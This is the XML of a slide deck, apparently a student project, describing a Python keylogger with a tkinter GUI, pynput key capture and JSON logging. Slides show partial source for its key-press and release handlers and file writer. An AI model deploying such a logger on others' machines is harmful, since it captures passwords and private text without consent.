                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>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581192" y="323232"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629435"/>
            <a:r>
              <a:rPr b="0" dirty="0" sz="2400" i="0" lang="en-US">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600" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909017" y="233938"/>
            <a:ext cx="11613485" cy="5563973"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" bIns="45720" lIns="91440" rIns="91440" rtlCol="0" tIns="45720" vert="horz">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="1800" i="0" lang="en-US">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b="0" dirty="0" i="0" lang="en-US">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b="0" dirty="0" i="0" lang="en-US">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b="0" dirty="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>JSON file generation: The new keylogger will generate a JSON file that contains the keylogging data, making it easier to analyze and visualize the data.</a:t>
            </a:r>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a:t>
            </a:r>
            <a:endParaRPr dirty="0"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dirty="0" sz="1800" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048603" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="581192" y="1120210"/>
            <a:ext cx="12153900" cy="3838452"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0" bIns="198375" compatLnSpc="1" lIns="0" numCol="1" rIns="0" tIns="198375"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rgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>The following is the development approach for the new keylogger:</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1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0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Design the GUI: Create a simple GUI using </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" err="1" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t> that includes a start and stop button.</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0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Implement the keylogger functionality: Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="1" cap="none" dirty="0" sz="3200" i="0" kumimoji="0" lang="en-US" normalizeH="0" err="1" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t> library to capture the key presses and releases.</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0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Implement JSON file generation: Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="1" cap="none" dirty="0" sz="3200" i="0" kumimoji="0" lang="en-US" normalizeH="0" err="1" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t> library to generate a JSON file that contains the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400" eaLnBrk="0" fontAlgn="base" hangingPunct="0" indent="0" latinLnBrk="0" lvl="0" marL="0" marR="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
            </a:pPr>
            <a:r>
              <a:rPr altLang="en-US" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t> keylogging data.</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0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Integrate the keylogger functionality with the GUI: Connect the GUI buttons to the keylogger functionality.</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rgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>
            </a:endParaRP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0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Test the keylogger: Test the keylogger on different systems and scenarios to ensure its functionality.</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32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5" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380989" y="477169"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2097153" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1767592" y="2813831"/>
            <a:ext cx="8087854" cy="1524213"/>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6"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7" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="218429" y="-431231"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" i="0" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Create GUI</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0" sz="2000" i="0" lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="1" dirty="0" sz="2000" i="0" lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097154" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="1745289"/>
            <a:ext cx="10955279" cy="4667901"/>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8"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9"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0" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="5632311"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t># Initialize the variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>keys = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    if flag == False:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>            {'Pressed': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        flag = True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>            {'Held': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>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2"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3" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    keys = keys + str(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    with open('</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>key_log.json</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>', '+</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>wb</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>') as </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>key_log</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>json.dumps</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>).encode()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>key_log.write</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="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Murugadass A</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-26T05:50:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-04T16:14:27Z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d136db3161d74a29ab47d401bdc4b2ed</vt:lpwstr>
  </property>
</Properties>
</file>